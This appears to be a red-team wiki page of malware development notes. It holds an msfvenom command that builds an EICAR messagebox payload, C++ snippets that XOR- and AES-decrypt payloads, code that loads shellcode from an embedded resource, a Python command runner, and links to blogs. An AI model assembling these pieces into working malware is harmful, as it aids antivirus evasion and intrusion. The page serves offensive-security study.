Links

Malware Development

EIKAR Test File:
$ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" -f raw -o eikar.bin

Code Snippets

C++

XOR encryption:
void XOR(char* data, size_t data_len) {
const char key[] = "abcdefghjiklmnopqrstuvwxyz";
int j = 0;
for (int i = 0; i < data_len; i++) {
if (j == sizeof(key) - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}
}
AES encryption:
// Credit: Sektor7 RTO Malware Essential Course
int AESDecrypt(char* payload, unsigned int payload_len, char* key, size_t keylen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) return -1;
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) return -1;
if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) return -1;
if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) return -1;
if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)payload, (DWORD*)&payload_len)) return -1;
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
return 0;
}
Invoke the shellcode from an embed resource:
HRSRC scResource = FindResource(NULL, MAKEINTRESOURCE(IDR_RESOURCE_BIN1), "RESOURCE_BIN");
DWORD shellcodeSize = SizeofResource(NULL, scResource);
HGLOBAL scResourceData = LoadResource(NULL, scResource);
unsigned char* shellcode;
shellcode = (unsigned char*)malloc(shellcodeSize);
memcpy(shellcode, scResourceData, shellcodeSize);

Python

Run OS command:
runCmd.py
import subprocess, shlex
def run_command(command):
process = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE)
while True:
output = process.stdout.readline().decode()
if output == '' and process.poll() is not None:
break
if output:
print(output.strip())
res = process.poll()
return res

Blog Series

@0xPat

@cocomelonc

@preemptdev

@chvancooten

Windows APT Warfare

Last modified 3mo ago